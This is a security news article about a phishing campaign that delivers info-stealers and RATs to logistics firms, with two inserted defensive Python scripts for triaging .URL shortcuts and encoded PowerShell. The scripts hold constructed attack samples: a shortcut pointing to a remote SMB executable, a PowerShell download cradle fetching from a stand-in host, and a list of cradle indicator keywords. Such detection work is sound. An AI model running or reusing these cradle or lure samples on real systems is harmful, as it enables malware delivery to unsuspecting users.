Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a variety of information stealers and remote access trojans (RATs).
The activity cluster, per Proofpoint, makes use of compromised legitimate email accounts belonging to transportation and shipping companies so as to inject malicious content into existing email conversations.
As many as 15 breached email accounts have been identified as used as part of the campaign. It is currently not clear how these accounts are infiltrated in the first place or who is behind the attacks.
“Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport,” the enterprise security firm said in an analysis published Tuesday.
“In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2.”
The attack chains involve sending messages bearing internet shortcut (.URL) attachments or Google Drive URLs leading to a .URL file that, when launched, uses Server Message Block (SMB) to fetch the next-stage payload containing the malware from a remote share.
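The .URL delivery step above can be triaged before a user ever double-clicks: an internet shortcut is a small INI-style text file, so a mail gateway or sandbox can parse the `[InternetShortcut]` section and flag any target that names a remote SMB share. The script below is an added example written for this article, not Proofpoint's tooling; the shortcut contents and the 203.0.113.5 address are constructed, and checking `IconFile` and `WorkingDirectory` in addition to `URL` is a generalization of the article's description, on the assumption that any field of the shortcut that resolves to a UNC path will cause an outbound SMB connection.

```python
"""Flag Windows internet shortcut (.URL) attachments whose target, icon or
working directory points at a remote SMB share (\\host\share or file://host/...).
Added example; sample shortcuts below are constructed, not real attachments."""
import re
from urllib.parse import urlparse

# Constructed sample attachments (203.0.113.5 is a documentation address).
SAMPLES = {
    "invoice.url": "[InternetShortcut]\r\nURL=file://203.0.113.5/share/invoice.pdf.exe\r\nIconIndex=13\r\n",
    "tracking.url": "[InternetShortcut]\r\nURL=https://example.com/tracking\r\n",
    "report.url": "[InternetShortcut]\r\nURL=https://example.com/report\r\n"
                  "IconFile=\\\\203.0.113.5\\share\\icon.ico\r\n",
}

UNC_RE = re.compile(r"^\\\\[^\\]+\\")  # \\host\share...
REMOTE_FIELDS = ("url", "iconfile", "workingdirectory")


def parse_internet_shortcut(text):
    """Return key/value pairs of the [InternetShortcut] section.
    Keys are lower-cased; the first occurrence of a key wins."""
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields.setdefault(key.strip().lower(), value.strip())
    return fields


def remote_share_target(value):
    """True if value names a host on an SMB/UNC path: \\host\share or file://host/share.
    A local file:///C:/... URL has an empty netloc and is not flagged."""
    if UNC_RE.match(value):
        return True
    parsed = urlparse(value)
    return parsed.scheme.lower() == "file" and bool(parsed.netloc)


def triage(name, text):
    """Return one finding string per field that would reach out over SMB."""
    fields = parse_internet_shortcut(text)
    return [f"{name}: {key} points at remote share: {fields[key]}"
            for key in REMOTE_FIELDS
            if key in fields and remote_share_target(fields[key])]


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        for finding in triage(name, text) or [f"{name}: no remote share reference"]:
            print(finding)
```

In practice this check belongs at the point where attachments (and files fetched from the Google Drive link) are unpacked; a .URL whose target is an SMB share has no business in a business email and can simply be quarantined, and the host named in the finding is the indicator to block at the egress firewall (outbound TCP/445 from workstations should not be allowed in any case).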
Some variants of the campaign observed in August 2024 have also latched onto a recently popular technique called ClickFix to trick victims into downloading the DanaBot malware under the pretext of addressing an issue with displaying document content in the web browser.
Specifically, this entails urging users to copy and paste a Base64-encoded PowerShell script into the terminal, thereby triggering the infection process.
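Because the ClickFix lure makes the victim launch PowerShell with a Base64 argument, the resulting process creation event is the natural place to detect it. Below is an added example, not code from the article or from Proofpoint, that scans process command lines for `-EncodedCommand` (PowerShell also accepts any unambiguous prefix such as `-enc` or `-e`, and `-ec`), decodes the UTF-16LE payload and flags the download-and-execute indicators a responder would look for. The command lines are constructed sample telemetry and the encoded script uses the reserved `example.invalid` domain.

```python
"""Triage encoded PowerShell launches of the kind ClickFix lures produce:
find -EncodedCommand (or an abbreviation), decode the Base64/UTF-16LE script
and flag common download-and-run indicators. Added example; the command
lines below are constructed sample telemetry, not real logs."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec.
_FLAG = "encodedcommand"
_FLAGS = sorted([_FLAG[:i] for i in range(1, len(_FLAG) + 1)] + ["ec"],
                key=len, reverse=True)
ENC_RE = re.compile(r"(?:^|\s)[-/](?:" + "|".join(_FLAGS) + r")\s+([A-Za-z0-9+/=]{8,})",
                    re.IGNORECASE)

# Substrings (lower-cased) that mark a script as a download cradle or stager.
SUSPICIOUS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
              "frombase64string", "net.webclient", "invoke-webrequest",
              "start-bitstransfer")


def decode_encoded_command(b64):
    """Decode the argument of -EncodedCommand: Base64 over UTF-16LE text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def triage_command_line(cmdline):
    """Return None if the command line carries no encoded script, otherwise a
    dict with the decoded text, matched indicators and any decode error."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        script = decode_encoded_command(match.group(1))
    except (ValueError, UnicodeDecodeError):
        return {"decoded": None, "indicators": [], "error": "undecodable payload"}
    lowered = script.lower()
    return {"decoded": script,
            "indicators": [s for s in SUSPICIOUS if s in lowered],
            "error": None}


def _encode(text):
    """Produce the Base64/UTF-16LE form PowerShell expects (used to build samples)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample process command lines: one benign, one cradle, one harmless encoded.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\scripts\backup.ps1',
    "powershell.exe -w hidden -nop -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"),
    "powershell -EncodedCommand " + _encode("Get-Date"),
]


if __name__ == "__main__":
    for cmdline in SAMPLE_COMMAND_LINES:
        result = triage_command_line(cmdline)
        if result is None:
            print("no encoded command:", cmdline[:60])
        else:
            print("decoded:", result["decoded"], "| indicators:", result["indicators"])
```

The decoded text, not the Base64 blob, is what should be matched by detection rules and shown to analysts; an encoded launch with no indicators (the `Get-Date` sample) is still worth a low-severity alert when the parent process is a browser or `explorer.exe`, since that parent/child pairing is exactly what a copy-and-paste lure produces.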
“These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management,” Proofpoint said.
“The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company’s operations before sending campaigns.”
The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS).
It also follows the emergence of a new version of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) codenamed SnipBot that is distributed via bogus links embedded within phishing emails. Some aspects of the campaign were previously highlighted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.
“SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim’s system,” Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel said.
“The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable.”
While systems infected with RomCom have also witnessed ransomware deployments in the past, the cybersecurity company pointed out the absence of this behavior, raising the possibility that the threat actor behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure financial gain to espionage.